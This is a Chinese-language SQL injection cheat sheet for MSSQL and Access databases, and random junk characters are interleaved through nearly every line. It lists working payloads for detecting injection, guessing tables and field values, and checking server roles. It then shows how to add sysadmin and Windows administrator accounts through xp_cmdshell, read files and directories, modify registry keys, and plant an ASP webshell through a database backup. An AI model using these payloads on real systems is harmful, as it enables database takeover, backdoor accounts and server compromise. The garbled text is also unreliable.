1.判断是否有注入;and 1=1 ;and 1=2 E#IiyZ
2.初步判断是否是mssql ;and user>0 G_4K+
-K
~z-?rW
3.注入参数是字符'and [查询条件] and ''=' M6o
xtt4
f}evw K[S
4.搜索时没过滤参数的'and [查询条件] and '%25'='
ox i
a}
P>yG/:W;
5.判断数据库系统 HM(bR"E
nm{'HH-4
;and (select count(*) from sysobjects)>0 mssql ntA[[OIFO
yH0yO*RZ
;and (select count(*) from msysobjects)>0 access CWobvR)e
/h}wM6pg
|,M#8NOp:
t(uB66(_F
6.猜数据库 ;and (select Count(*) from [数据库名])>0 \S|VkPv
#'G7mAoA
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 U#UVenp@
2ZTyo7P
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ^^t]vojX
;:8jxkx6%
9.(1)猜字段的ascii值(access) 'AAF/ 9
JWUv H
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 O|^6UH
h^[ppc{Z
(2)猜字段的ascii值(mssql) "R\\\I7u
;ZE<6;#3IP
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ~,M;+T}[r
$z`cMQ r
10.测试权限结构(mssql)
bSeL"
]/<Qn-BbU
fxtYo,;$
CwH)6uA
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- XSHwE)m
6f5sIg
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- {8>_,z^P)
~NxoF
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- q)z1</B-
{_k!!p6
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- Ekg N6S`}
u}@%70A
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- }~Kyw7?
=vqE=:X6
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- B 3,ig9
=Y=^]ayO/
;and 1=(select IS_MEMBER('db_owner'));-- DY+8m8!4H
[u9S+:7"
a s<q
ui#1 +p3G
11.添加mssql和系统的帐户 MR l*rK
fi-&[llg
;exec master.dbo.sp_addlogin username;-- NdED8 iRc
;exec master.dbo.sp_password null,username,password;-- H?/cG_^y0
gp|7{}Q{
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- K&"Pm9
~1wdAq`'a
;exec master.dbo.xp_cmdshell 'net user username password e&a[k
5)SZd)
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- !\D]\|Bo
mGyIr kE
;exec master.dbo.xp_cmdshell 'net user username password /add';-- Y$`hudJ&
iR}i42Cu
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- ;HLMU36q
BoiIr[ (
Y[8co<p
Ll E_{||h
12.(1)遍历目录 +/_B/[e<>
0.+Z;j
;create table dirs(paths varchar(100), id int) Z@aL"@2]a
J'Mgj$T $
;insert dirs exec master.dbo.xp_dirtree 'c:\' !+26a*P
&fNE9peQFa
;and (select top 1 paths from dirs)>0 aBtfZDCfzp
9Nbg@5(
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) HEfA c
qu~"C,
'8pPGh9D
s"Pk-Dv
(2)遍历目录 a!J ow?(
)eGu4iEPM
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- nR |LV'(
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 `R=_t]ie
GHsdLe=t0#
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 CH_Dat>
KL\=:iWA
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树结构
-0J<R;cVs
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 K}*p(1$u
;NVTn<Uj
O}iKPY8K
w#bbm'j7r
13.mssql中的存储过程 )*<d1$aM
% |Gzht\
xp_regenumvalues 注册表根键, 子键 ^A$XXH'
28qWC~/9
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 3'@jRK
`YU:kj<6
xp_regread 根键,子键,键值名 ]X;*\-
L5|;VH
;exec xp_regread (IQ L`3f%
cw-JGqLx
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回指定键值的值
l{SPV8[i
xp_regwrite 根键,子键, 值名, 值类型, 值 2o3k=hKS
[67f; ?b
值类型有两种: REG_SZ 表示字符串型, REG_DWORD 表示整型
XlcDF|?{.
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 zgOwSg8
<y/AEY1
xp_regdeletevalue 根键,子键,值名 :qKY@-t7H
"YU~QOGx@
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 8}b[Q/h!
bH]!~[
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 %SFR.U0}yK
gM[
J'DMW
h/~BUg'
5Kxk9{\8
14.mssql的backup创建webshell kF~e3A7C
qCT\rZU
use model m&c(N
k"-#ox!
create table cmd(str image); 6HQwL\r79
#mxfU>vQ:
insert into cmd(str) values (''); JJ06f~Iw[
hds4_
backup database model to disk='c:\l.asp'; @a3v[}c*
>x0lSL0y
VQ}3r)ch
*%+buHe
15.mssql内置函数 OvG |=
\`# 0,pLr
;and (select @@version)>0 获得SQL Server的版本信息(其中包含Windows的版本号)
m3e49 bP
;and user_name()='dbo' 判断当前连接用户在当前库中是否映射为dbo(sa等sysadmin成员会映射为dbo)
%E_{L
;and (select user_name())>0 爆当前系统的连接用户 (19<8a9G
xM,(|p(
;and (select db_name())>0 得到当前连接的数据库 p[:%Ck"$7
Bq`kVfx
,6pH *b$
2 ZXF_ o
16.简洁的webshell wajhFBJ
C{^@. 8:
use model Uwa1)Lwn
^Z+D7Q
create table cmd(str image); yt,;^o^
z*1K<w8
insert into cmd(str) values (''); oPZ4}>uV
6GvnyJ{[
backup database model to disk='g:\wwwtest\l.asp';